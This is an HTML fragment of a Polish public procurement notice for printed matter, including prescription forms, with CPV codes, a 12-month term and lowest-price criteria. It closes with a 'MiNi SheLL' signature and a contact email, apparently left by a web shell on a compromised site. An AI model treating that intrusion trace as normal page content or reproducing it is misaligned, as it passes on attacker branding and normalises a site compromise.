<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.45.80.00-5, 22.90.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Recepty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Recepta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com